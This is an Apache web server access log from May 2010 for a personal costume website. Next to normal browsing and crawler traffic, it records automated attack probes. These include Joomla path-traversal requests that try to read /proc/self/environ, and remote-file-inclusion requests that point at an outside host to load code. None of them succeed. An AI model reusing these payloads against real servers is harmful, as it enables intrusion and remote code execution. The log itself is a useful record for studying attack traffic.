94.23.20.123 - - [19/May/2010:05:25:01 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:25:02 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:25:02 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:25:48 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:25:54 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:26:01 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:26:01 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:26:01 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:26:11 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
207.46.195.225 - - [19/May/2010:05:26:35 -0500] "GET /logs/access_log.1204588800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [19/May/2010:05:27:01 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
81.3.154.94 - - [19/May/2010:05:31:12 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:15 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:16 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:16 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:16 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:21 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:31:37 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:40 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:42 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.1" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:57 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:57 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:58 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:59 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:59 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:05:32:59 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
87.250.255.243 - - [19/May/2010:05:33:56 -0500] "GET /logs/access_log.1258675200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.20.123 - - [19/May/2010:05:38:35 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:38:35 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
111.67.9.133 - - [19/May/2010:05:39:55 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
67.195.112.180 - - [19/May/2010:05:40:33 -0500] "GET /logs/access_log.1168041600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.20.123 - - [19/May/2010:05:40:37 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:40:41 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
114.108.151.149 - - [19/May/2010:05:41:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.23.20.123 - - [19/May/2010:05:41:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
208.115.111.248 - - [19/May/2010:05:41:38 -0500] "GET /logs/access_log.1212364800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:40 -0500] "GET /logs/access_log.1212624000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:42 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:44 -0500] "GET /logs/access_log.1212883200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:46 -0500] "GET /logs/access_log.1213056000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:49 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:51 -0500] "GET /logs/access_log.1213228800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:54 -0500] "GET /logs/access_log.1213315200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
114.108.151.149 - - [19/May/2010:05:41:54 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.115.111.248 - - [19/May/2010:05:41:56 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:05:41:59 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
94.23.20.123 - - [19/May/2010:05:42:26 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:42:26 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:42:27 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:42:27 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:42:27 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:42:27 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
114.108.151.149 - - [19/May/2010:05:43:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.133.201.194 - - [19/May/2010:05:43:43 -0500] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:43:43 -0500] "GET /logs/access_log.1272844800/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:43:44 -0500] "GET /logs/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
114.108.151.149 - - [19/May/2010:05:43:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:43:55 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:44:38 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:44:39 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:44:39 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:44:49 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:45:37 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:45:43 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:45:43 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
111.67.9.133 - - [19/May/2010:05:46:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.133.201.194 - - [19/May/2010:05:47:24 -0500] "GET /logs/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:47:24 -0500] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:47:26 -0500] "GET /logs/access_log.1272844800/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 338 "-""Mozilla/5.0"
114.108.151.149 - - [19/May/2010:05:47:27 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:47:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:47:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:05:47:31 -0500] "GET /costume/thmb2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.20.123 - - [19/May/2010:05:50:35 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:50:35 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:50:36 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
114.108.151.149 - - [19/May/2010:05:51:20 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:51:21 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:51:22 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.20.123 - - [19/May/2010:05:51:28 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
174.133.201.194 - - [19/May/2010:05:51:49 -0500] "GET /logs//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:49 -0500] "GET /logs/access_log.1266019200//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:50 -0500] "GET /logs/access_log.1266537600//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:50 -0500] "GET //inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:54 -0500] "GET /logs//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:54 -0500] "GET /logs/access_log.1266019200//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:55 -0500] "GET /logs/access_log.1266537600//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:51:55 -0500] "GET //inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.23.20.123 - - [19/May/2010:05:52:19 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:52:19 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:52:20 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.133.201.194 - - [19/May/2010:05:52:58 -0500] "GET //inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:52:58 -0500] "GET /logs/access_log.1265673600//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:52:59 -0500] "GET /logs/access_log.1264636800//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:52:59 -0500] "GET /logs//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:53:08 -0500] "GET //inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
